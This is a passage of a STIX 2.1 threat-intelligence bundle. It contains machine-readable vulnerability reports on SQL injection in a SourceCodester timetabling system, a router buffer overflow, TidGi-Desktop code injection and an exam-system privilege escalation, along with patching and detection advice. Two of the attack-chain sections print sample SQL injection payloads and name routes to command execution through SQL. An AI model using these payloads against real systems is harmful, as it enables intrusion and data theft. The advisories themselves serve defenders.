          "url": "https://attack.mitre.org/techniques/T1537"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c642c492-b761-5bc9-8274-765e0718e988",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3b51f574-a324-5c77-bd85-caaacbea9539",
      "target_ref": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3b51f574-a324-5c77-bd85-caaacbea9539",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14733: Remote SQL Injection in SourceCodester Class and Exam Timetabling System",
      "description": "## Overview\n\nA significant SQL injection vulnerability, tracked as CVE-2026-14733, has been identified in SourceCodester Class and Exam Timetabling System version 1.0. This flaw, rated with a CVSS v3.1 base score of 7.3 (High), resides within the `/edit_coursea.php` component, where it improperly processes the `ID` argument. Exploitation is trivial for an unauthenticated attacker, allowing for remote SQL command execution. The vulnerability is critical for defenders as an exploit has been publicly disclosed and is actively available, increasing the likelihood of widespread exploitation. Organizations using this specific version of the Timetabling System are at immediate risk of data breaches and system compromise if not promptly patched.\n\n## Attack Chain\n\n1.  **Initial Access**: An unauthenticated attacker sends an HTTP GET request directly to the `/edit_coursea.php` endpoint of the vulnerable SourceCodester Class and Exam Timetabling System 1.0 web application.\n2.  **Exploitation Trigger**: The attacker crafts the `ID` parameter in the HTTP GET request to include SQL injection payloads, such as `?ID=1%20UNION%20SELECT%20...` or `?ID=1%27%20OR%201=1%20--%20`.\n3.  **Database Query Manipulation**: The web application's `/edit_coursea.php` script processes the unsanitized `ID` parameter directly within a SQL query designed to retrieve course information.\n4.  **SQL Execution**: The injected SQL payload is executed by the backend database, allowing the attacker to bypass authentication, query arbitrary tables, modify existing data, or potentially delete database entries.\n5.  **Information Disclosure/Modification**: Depending on the crafted payload, the attacker can exfiltrate sensitive data (e.g., user credentials, course details) from the database or alter existing records, leveraging the database's permissions.\n6.  **Potential Remote Code Execution**: If the backend database user has elevated privileges or the specific database system (e.g., SQL Server, MySQL, PostgreSQL) supports arbitrary command execution via SQL (e.g., `xp_cmdshell`, `LOAD_FILE/INTO OUTFILE`, `COPY TO PROGRAM`), the attacker might achieve remote code execution on the underlying server.\n7.  **Impact Achieved**: The attacker gains unauthorized access to and control over database contents, leading to breaches of data confidentiality, integrity compromise (data alteration/deletion), and potentially full system compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14733 can lead to severe consequences for affected organizations. Attackers can gain unauthorized access to the application's entire database, potentially exfiltrating sensitive information such as student records, course schedules, faculty details, and user credentials. Data integrity can be compromised through unauthorized modification or deletion of critical academic data. In scenarios where the database user has elevated privileges or the database engine allows OS command execution via SQL injection, attackers could achieve full remote code execution on the underlying server, leading to complete system compromise and further network penetration. Given the public availability of an exploit, any organization running the vulnerable version is at high risk of active exploitation.\n\n## Recommendation\n\n*   Immediately patch or upgrade SourceCodester Class and Exam Timetabling System to a non-vulnerable version to mitigate CVE-2026-14733.\n*   Deploy the provided Sigma rule to your SIEM to detect attempted exploitation of CVE-2026-14733 via unusual HTTP GET requests to `/edit_coursea.php` with SQL injection payloads.\n*   Review web server access logs for any suspicious requests targeting `/edit_coursea.php` with malformed `ID` parameters prior to patching.\n",
      "published": "2026-07-05T09:19:46Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14733"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/cyberdrinclk/scve/issues/1"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14733"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/847983"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376315"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376315/cti"
        },
        {
          "source_name": "reference",
          "url": "https://www.sourcecodester.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fcbddb88-4c27-5fec-9887-fc05c211f5cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ee36be3-f59b-5034-827f-3c94501f1d6b",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7ee36be3-f59b-5034-827f-3c94501f1d6b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14732: SQL Injection in SourceCodester Class and Exam Timetabling System",
      "description": "## Overview\n\nA critical SQL injection vulnerability (CVE-2026-14732) has been publicly disclosed in SourceCodester Class and Exam Timetabling System version 1.0. This flaw, residing in the `/edit_exam.php` file, allows unauthenticated remote attackers to execute arbitrary SQL commands against the backend database by manipulating the `ID` argument. The vulnerability was published to NVD on July 5, 2026, with a CVSS v3.1 base score of 7.3 (High). The public disclosure of exploit details means that this vulnerability can be actively leveraged by malicious actors. Organizations using this system are at immediate risk of data compromise, unauthorized access, and potential remote code execution, making prompt remediation crucial for protecting sensitive information and maintaining system integrity. This affects any instance exposed to the internet.\n\n## Attack Chain\n\n1.  Attacker identifies an internet-facing instance of SourceCodester Class and Exam Timetabling System 1.0.\n2.  Attacker crafts a specially formed HTTP GET or POST request targeting the `/edit_exam.php` endpoint.\n3.  The request includes a malicious SQL payload within the `ID` argument (e.g., `id=1%27+UNION+SELECT+null,user(),null--`).\n4.  The vulnerable application processes this request without properly sanitizing the `ID` input, causing the web server to execute the attacker's embedded SQL query against its backend database.\n5.  The database responds to the malicious query, potentially revealing sensitive data such as user credentials, database schema, or other confidential information.\n6.  The web server includes the results of the SQL query within the HTTP response, allowing the attacker to exfiltrate the compromised data.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14732 can lead to severe consequences for organizations utilizing SourceCodester Class and Exam Timetabling System 1.0. Attackers can exfiltrate sensitive student and faculty data, manipulate existing records, or gain administrative access to the application. This could result in privacy breaches, academic fraud, disruption of critical scheduling operations, and reputational damage. The public availability of exploit details increases the likelihood of widespread targeting and automated attacks against vulnerable systems, posing a significant risk to affected educational institutions or internal training departments.\n\n## Recommendation\n\n*   Patch CVE-2026-14732 on all affected SourceCodester Class and Exam Timetabling System 1.0 instances immediately.\n*   Deploy the provided Sigma rule to your SIEM to detect exploitation attempts targeting `/edit_exam.php`.\n*   Review web server access logs for `SourceCodester Class and Exam Timetabling System 1.0` for requests to `/edit_exam.php` containing suspicious `ID` parameters indicative of SQL injection.\n",
      "published": "2026-07-05T09:18:49Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "sourcecodester",
        "initial-access"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14732"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/cyberdrinclj/pcve/issues/1"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14732"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376314"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9677b7e3-5c99-5e3b-ac34-125d65aaa140",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ec68fdbf-42e3-5fb3-b503-c5c42988b4db",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cf20f2ae-ecf1-5c3d-891c-e4252bae0cd0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ec68fdbf-42e3-5fb3-b503-c5c42988b4db",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ec68fdbf-42e3-5fb3-b503-c5c42988b4db",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14721: UTT HiPER 1250GW Remote Code Execution via Buffer Overflow",
      "description": "## Overview\n\nCVE-2026-14721 identifies a severe stack-based buffer overflow vulnerability affecting UTT HiPER 1250GW devices, specifically firmware versions up to 3.2.7-210907-180535. The flaw resides within an unspecified function of the `/goform/ConfigWirelessBase_5g` file, part of the device's Web Endpoint component. This vulnerability is triggered by manipulating the `ssid` argument supplied to this endpoint, allowing a remote attacker to overflow a buffer. The exploit for this vulnerability has been publicly disclosed and, as such, poses an immediate and significant risk of active exploitation. For defenders, this means internet-exposed UTT HiPER 1250GW devices are vulnerable to unauthenticated remote code execution, granting attackers full control and potentially compromising the underlying network infrastructure.\n\n## Attack Chain\n\n1.  **Initial Reconnaissance**: An attacker identifies internet-facing UTT HiPER 1250GW devices and confirms their vulnerable firmware version (up to 3.2.7-210907-180535).\n2.  **Exploit Crafting**: The attacker develops or utilizes a publicly available exploit that crafts a malicious HTTP POST request.\n3.  **Payload Delivery**: The crafted HTTP POST request is sent to the `/goform/ConfigWirelessBase_5g` web endpoint on the target device.\n4.  **Argument Manipulation**: The request specifically manipulates the `ssid` argument, supplying an oversized or specially malformed string containing attacker-controlled data, often embedding shellcode.\n5.  **Buffer Overflow Trigger**: Upon processing the manipulated `ssid` argument, the vulnerable function in the `ConfigWirelessBase_5g` component encounters a stack-based buffer overflow.\n6.  **Arbitrary Code Execution**: The overflow corrupts memory and diverts program execution to the attacker's injected shellcode, achieving arbitrary code execution with the privileges of the affected process.\n7.  **Device Compromise**: The attacker gains full control over the UTT HiPER 1250GW device, enabling subsequent malicious activities such as network pivoting, data exfiltration, or establishing persistent access.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14721 results in complete compromise of the UTT HiPER 1250GW device, granting the attacker arbitrary code execution capabilities. Given that these devices are typically network infrastructure components (gateways, routers), a compromise can lead to significant network disruption, unauthorized access to internal network segments, data interception, or the use of the device as a pivot point for further attacks. While specific victim counts or targeted sectors are not detailed, any organization utilizing affected UTT HiPER 1250GW devices exposed to the internet is at high risk, especially with the public disclosure of exploit code.\n\n## Recommendation\n\n*   **Patch CVE-2026-14721** immediately by upgrading UTT HiPER 1250GW devices to a patched firmware version beyond 3.2.7-210907-180535.\n*   **Monitor web server access logs** for HTTP POST requests directed to the `/goform/ConfigWirelessBase_5g` path.\n*   **Implement Web Application Firewall (WAF) rules** to scrutinize and block unusually long or malformed `ssid` parameters in requests targeting the `/goform/ConfigWirelessBase_5g` web endpoint, which could indicate exploitation attempts against CVE-2026-14721.\n",
      "published": "2026-07-05T08:39:37Z",
      "labels": [
        "buffer-overflow",
        "remote-code-execution",
        "network-device",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14721"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/J-CLOWN-TAROT/UTT"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14721"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/847632"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376308"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376308/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a3892b06-8b3d-5bfa-b150-f4e4aab8350a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/tiddly-gittly/TidGi-Desktop/",
      "pattern": "[url:value = 'https://github.com/tiddly-gittly/TidGi-Desktop/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T08:26:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6b786a2c-9901-518f-8b91-f3b3ec690482",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b648a94b-5326-5a6a-994c-d22cfc837c73",
      "target_ref": "indicator--a3892b06-8b3d-5bfa-b150-f4e4aab8350a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fe3d5ffa-2854-5d61-8ee6-26c0ad82aea2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/tiddly-gittly/TidGi-Desktop/security/advisories/GHSA-9hc2-hjx8-q6pv",
      "pattern": "[url:value = 'https://github.com/tiddly-gittly/TidGi-Desktop/security/advisories/GHSA-9hc2-hjx8-q6pv']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T08:26:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d9ba6f53-bc38-5393-8c4b-ce8e7598fc85",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b648a94b-5326-5a6a-994c-d22cfc837c73",
      "target_ref": "indicator--fe3d5ffa-2854-5d61-8ee6-26c0ad82aea2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ca71ec87-33c1-5a46-94f3-c84dffda5f3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14722",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14722']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T08:26:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc795222-e6f2-5bc8-8a59-cd983367178c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b648a94b-5326-5a6a-994c-d22cfc837c73",
      "target_ref": "indicator--ca71ec87-33c1-5a46-94f3-c84dffda5f3d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9cc494bd-2b14-5341-9cf4-cf0136009dd2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/847648",
      "pattern": "[url:value = 'https://vuldb.com/submit/847648']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T08:26:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6cbc9c49-73ba-50fc-9211-1edefd770448",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b648a94b-5326-5a6a-994c-d22cfc837c73",
      "target_ref": "indicator--9cc494bd-2b14-5341-9cf4-cf0136009dd2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e399104a-0024-5734-8967-3c8e53be615d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376309",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376309']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T08:26:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb8491d7-2cc2-52ec-93d2-71005e31d8e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b648a94b-5326-5a6a-994c-d22cfc837c73",
      "target_ref": "indicator--e399104a-0024-5734-8967-3c8e53be615d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--abbdbce8-46eb-5a58-95d5-b77bab15521e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376309/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376309/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T08:26:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c0ae49c2-5188-5ab6-8177-cad7098ace6c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b648a94b-5326-5a6a-994c-d22cfc837c73",
      "target_ref": "indicator--abbdbce8-46eb-5a58-95d5-b77bab15521e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--87de4a7f-b69c-5b76-ac7e-063a1d60099b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b648a94b-5326-5a6a-994c-d22cfc837c73",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--453f9f0d-6f13-5030-9a42-3dbcbef5aac1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b648a94b-5326-5a6a-994c-d22cfc837c73",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b648a94b-5326-5a6a-994c-d22cfc837c73",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14722: Remote Code Injection in TidGi-Desktop Git Repository Import Component",
      "description": "## Overview\n\nA significant remote code injection vulnerability, tracked as CVE-2026-14722, has been discovered in tiddly-gittly TidGi-Desktop, affecting all versions up to and including 0.13.0. This flaw resides within an unknown function of the `src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts` file, specifically part of the 'Git Repository Import' component. The vulnerability allows an unauthenticated, remote attacker to manipulate this component, leading to arbitrary code injection and execution on the affected system. The exploit for CVE-2026-14722 has been made public, indicating a high likelihood of in-the-wild exploitation. Defenders should treat this with urgency due to the potential for complete system compromise without user interaction.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker identifies a publicly accessible or internal instance of tiddly-gittly TidGi-Desktop running a vulnerable version (0.13.0 or earlier).\n2.  **Vulnerability Identification**: The attacker targets the 'Git Repository Import' component, which is known to contain the code injection vulnerability CVE-2026-14722.\n3.  **Payload Crafting**: The attacker crafts a specially malformed input or data packet designed to be processed by the vulnerable `src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts` function. This crafted input includes malicious code.\n4.  **Remote Exploitation**: The attacker sends this malicious input remotely to the TidGi-Desktop instance, requiring no prior authentication or user interaction as per CVSS `PR:N/UI:N`.\n5.  **Code Injection**: The vulnerable function processes the attacker's input without proper neutralization of special elements, causing the embedded malicious code to be injected into the application's execution flow.\n6.  **Arbitrary Code Execution**: The injected code is executed on the host system within the context of the TidGi-Desktop application, granting the attacker arbitrary code execution capabilities.\n7.  **Impact**: This typically leads to complete system compromise, enabling data exfiltration, deployment of further malware (e.g., ransomware), or establishing persistent access.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14722 allows for unauthenticated, remote arbitrary code execution on systems running vulnerable TidGi-Desktop instances. This critical flaw can lead to severe consequences, including full control over the compromised host, data theft, destruction or modification of sensitive information, and deployment of additional malicious payloads such as ransomware or backdoors. While no specific victim counts or targeted sectors have been identified yet, the public availability of exploit details increases the risk for any organization or individual using the affected software.\n\n## Recommendation\n\n*   Immediately patch or update tiddly-gittly TidGi-Desktop to a version beyond 0.13.0 to remediate CVE-2026-14722.\n*   Review network configurations to limit exposure of TidGi-Desktop instances to untrusted networks, especially if immediate patching is not feasible.\n*   Deploy endpoint detection and response (EDR) solutions capable of detecting anomalous process creation or outbound network connections originating from the TidGi-Desktop application process.\n*   Monitor systems running TidGi-Desktop for any unusual activity, such as unexpected file modifications, new processes, or outbound connections, which could indicate exploitation of CVE-2026-14722.\n",
      "published": "2026-07-05T08:26:14Z",
      "labels": [
        "vulnerability",
        "code-injection",
        "remote-code-execution",
        "desktop-application"
      ],
      "object_refs": [
        "indicator--a3892b06-8b3d-5bfa-b150-f4e4aab8350a",
        "indicator--fe3d5ffa-2854-5d61-8ee6-26c0ad82aea2",
        "indicator--ca71ec87-33c1-5a46-94f3-c84dffda5f3d",
        "indicator--9cc494bd-2b14-5341-9cf4-cf0136009dd2",
        "indicator--e399104a-0024-5734-8967-3c8e53be615d",
        "indicator--abbdbce8-46eb-5a58-95d5-b77bab15521e",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14722"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/tiddly-gittly/TidGi-Desktop/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/tiddly-gittly/TidGi-Desktop/security/advisories/GHSA-9hc2-hjx8-q6pv"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14722"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/847648"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376309"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376309/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9d7b2dc8-0860-5e23-ac3e-cdbb355ca4b5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://pastebin.com/Z4i5MGxk",
      "pattern": "[url:value = 'https://pastebin.com/Z4i5MGxk']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T08:20:00Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--05d8f1e7-bf61-5248-ba9b-8ef4de5685a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7c4ac6e8-b593-5c79-8b52-e56be41199ef",
      "target_ref": "indicator--9d7b2dc8-0860-5e23-ac3e-cdbb355ca4b5"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4c3c6aac-8d6c-5ba3-b6bc-58a1ce0dd962",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7c4ac6e8-b593-5c79-8b52-e56be41199ef",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--201e3983-35f3-5e23-95da-e9140d76852d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7c4ac6e8-b593-5c79-8b52-e56be41199ef",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7c4ac6e8-b593-5c79-8b52-e56be41199ef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14719: SourceCodester Onlne Examination \u0026 Learning Management System Privilege Escalation",
      "description": "## Overview\n\nA significant vulnerability, tracked as CVE-2026-14719, has been discovered in SourceCodester Onlne Examination \u0026 Learning Management System version 1.0. This flaw affects the Registration Endpoint, specifically within the `register.php` file, where it exhibits improper privilege management. Attackers can exploit this by manipulating the `role` argument during user registration. This remote vulnerability can lead to privilege escalation, allowing an unauthenticated attacker to gain elevated access within the system, potentially compromising sensitive educational data or administrative functions. The severity of this issue is heightened by the fact that a public exploit has been published and is readily available for use, making it an immediate threat to organizations utilizing this system. Defenders should prioritize patching and monitoring for exploitation attempts.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An attacker identifies a publicly accessible instance of SourceCodester Onlne Examination \u0026 Learning Management System 1.0.\n2.  **Vulnerability Identification**: The attacker confirms the application version and identifies the vulnerable `register.php` endpoint.\n3.  **Crafted Request**: The attacker crafts an HTTP POST request to `/register.php` that includes a manipulated `role` argument within the registration data.\n4.  **Exploitation**: The crafted request is sent to the vulnerable endpoint, attempting to assign an elevated `role` (e.g., 'admin', 'instructor') to a newly created user account.\n5.  **Privilege Assignment**: Due to improper privilege management inherent in CVE-2026-14719, the system processes the request and creates the new user with the attacker-specified elevated `role`.\n6.  **Unauthorized Access**: The attacker logs into the system using the credentials of the newly created account, now possessing administrative or other highly privileged access.\n7.  **Impact**: The attacker gains full control over system functionalities, potentially accessing sensitive student records, modifying examination content, or disrupting learning operations.\n\n## Impact\n\nThe exploitation of CVE-2026-14719 can lead to severe consequences. Attackers can achieve unauthorized privilege escalation, granting them full administrative control over the SourceCodester Onlne Examination \u0026 Learning Management System. This can result in data breaches involving sensitive student or faculty information, unauthorized modification of grades or course materials, system downtime, and reputational damage for educational institutions. The public availability of an exploit significantly increases the likelihood of widespread attacks, putting all unpatched instances at immediate risk of compromise. The CVSS 3.1 Base Score of 7.3 (High) underscores the critical nature of this vulnerability.\n\n## Recommendation\n\n*   **Patch CVE-2026-14719**: Immediately apply any available patches or vendor-provided mitigations for SourceCodester Onlne Examination \u0026 Learning Management System 1.0 to address CVE-2026-14719.\n*   **Implement WAF Rules**: Deploy a Web Application Firewall (WAF) to block HTTP POST requests to `/register.php` that contain suspicious `role` parameter manipulations, as indicated in the Sigma rule.\n*   **Monitor Web Logs**: Enable and review web server logs for `/register.php` access patterns, specifically looking for HTTP POST requests with a `role` argument, as described in the provided Sigma rule.\n*   **Audit New User Registrations**: Regularly audit new user registrations for the SourceCodester Onlne Examination \u0026 Learning Management System, paying close attention to any accounts created with elevated or unusual privilege levels.\n",
      "published": "2026-07-05T08:20:00Z",
      "labels": [
        "privilege-escalation",
        "web-application",
        "cve",
        "sourcecodester",
        "improper-privilege-management"
      ],
      "object_refs": [
        "indicator--9d7b2dc8-0860-5e23-ac3e-cdbb355ca4b5",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
